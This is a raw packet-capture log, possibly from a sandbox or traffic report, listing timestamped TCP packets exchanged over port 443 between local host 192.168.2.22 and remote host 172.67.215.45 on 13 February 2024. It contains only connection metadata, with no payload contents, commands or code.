Feb 13, 2024 15:08:06.504208088 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.504262924 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.504271030 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.504282951 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.504612923 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.504631996 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.504671097 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.504678011 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.504692078 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.504717112 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.505542040 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.505565882 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.505625010 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.505625010 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.505633116 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.505659103 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.507373095 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.507395029 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.507426977 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.507433891 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.507445097 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.507479906 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.508368015 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.508389950 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.508421898 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.508429050 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.508439064 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.508454084 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.509207010 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.509232998 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.509263992 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.509269953 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.509280920 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.509308100 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.510134935 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.510159969 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.510190964 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.510200024 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.510210037 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.511375904 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.511403084 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.511454105 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.511460066 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.511485100 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.512211084 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.512231112 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.512260914 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.512269020 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.512283087 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.513236046 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.513261080 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.513298035 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.513304949 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.513315916 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.514131069 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.514151096 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.514195919 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.514202118 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.514211893 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.515211105 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.515237093 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.515280008 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.515286922 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.515310049 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.515310049 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.516192913 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.516212940 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.516254902 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.516262054 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.516341925 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.516434908 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.517115116 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.517138004 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.517172098 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.517179012 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.517189980 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.518218994 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.518245935 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.518286943 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.518295050 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.518306017 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.519311905 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.519340992 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.519377947 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.519386053 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.519395113 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.519593000 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.520298958 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.520333052 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.520370007 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.520378113 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.520387888 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.521017075 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.521047115 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.521075964 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.521083117 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.521095037 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.522027969 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.522052050 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.522085905 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.522093058 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.522104025 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.522140980 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.522794008 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.522816896 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.522860050 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.522867918 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.522877932 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.522892952 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.523766994 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.523792982 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.523844957 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.523854017 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.523855925 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.524398088 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.524418116 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.524446964 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.524455070 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.524475098 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.525243998 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.525269985 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.525299072 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.525305986 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.525317907 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.525916100 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.525937080 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.525989056 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.525996923 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.526006937 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.526067019 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.526282072 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.526304007 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.526338100 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.526345015 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.526357889 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.526357889 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.527225018 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.527251005 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.527281046 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.527287960 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.527298927 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.527329922 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.528042078 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.528064013 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.528105974 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.528111935 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.528121948 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.528904915 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.528930902 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.528954029 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.528960943 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.528976917 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.529086113 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.529086113 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.529099941 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.529122114 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.529133081 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.529176950 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.529181004 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.529207945 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.529267073 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.530152082 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.530177116 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.530221939 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.530230045 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.530240059 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.530859947 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.530891895 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.530925035 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.530934095 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.530944109 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.531752110 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.531774998 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.531840086 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.531869888 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.531905890 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.532033920 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.532059908 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.532092094 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.532104015 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.532120943 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.532145023 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.532960892 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.532984972 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.533010960 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.533019066 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.533030033 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.533876896 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.533911943 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.533940077 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.533951044 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.533962965 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.534610033 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.534632921 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.534662008 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.534668922 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.534706116 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.534873962 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.534903049 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.534925938 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.534933090 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.534948111 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.535830975 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.535852909 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.535881996 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.535888910 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.535900116 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.536057949 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.536628008 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.536653042 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.536688089 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.536694050 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.536705017 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.537575006 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.537600994 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.537631989 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.537638903 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.537652016 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.537661076 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.537682056 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.537707090 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.537714958 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.537733078 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.537739992 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.538549900 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.538578987 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.538609982 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.538618088 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.538630962 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.538702011 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.539433956 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.539458990 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.539490938 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.539496899 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.539508104 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.540242910 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.540270090 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.540294886 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.540302038 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.540317059 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.540333033 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.540460110 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.540482044 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.540508986 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.540517092 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.540532112 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.541496992 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.541527033 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.541551113 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.541558981 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.541570902 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.541616917 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.542224884 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.542248011 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.542284012 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.542289019 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.542300940 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.543112040 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.543134928 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.543186903 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.543186903 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.543195009 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.543251038 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.543340921 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.543361902 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.543385983 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.543392897 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.543406010 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.543436050 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.544305086 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.544327021 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.544357061 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.544364929 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.544375896 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.544434071 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.545202017 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.545223951 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.545258999 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.545264959 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.545275927 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.545943022 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.545968056 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.545998096 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.546005011 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.546015978 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.546040058 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.546132088 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.546152115 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.546175003 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.546184063 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.546192884 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.546345949 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.547065973 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.547092915 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.547116995 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.547123909 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.547137022 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.547137022 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.547946930 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.547966957 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.548003912 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.548010111 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.548021078 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.548688889 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.548715115 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.548749924 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.548758984 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.548768044 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.548970938 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.548993111 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.549134016 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.549134016 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.549165010 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.549783945 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.549809933 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.549839020 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.549846888 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.549873114 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.550600052 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.550623894 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.550657034 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.550664902 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.550674915 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.550713062 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.551470041 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.551491976 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.551558971 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.551558971 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.551564932 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.551657915 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.551690102 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.551717043 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.551724911 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.551734924 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.552535057 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.552557945 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.552596092 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.552603960 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.552613020 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.553495884 CET	443	49169	172.67.215.45	192.168.2.22
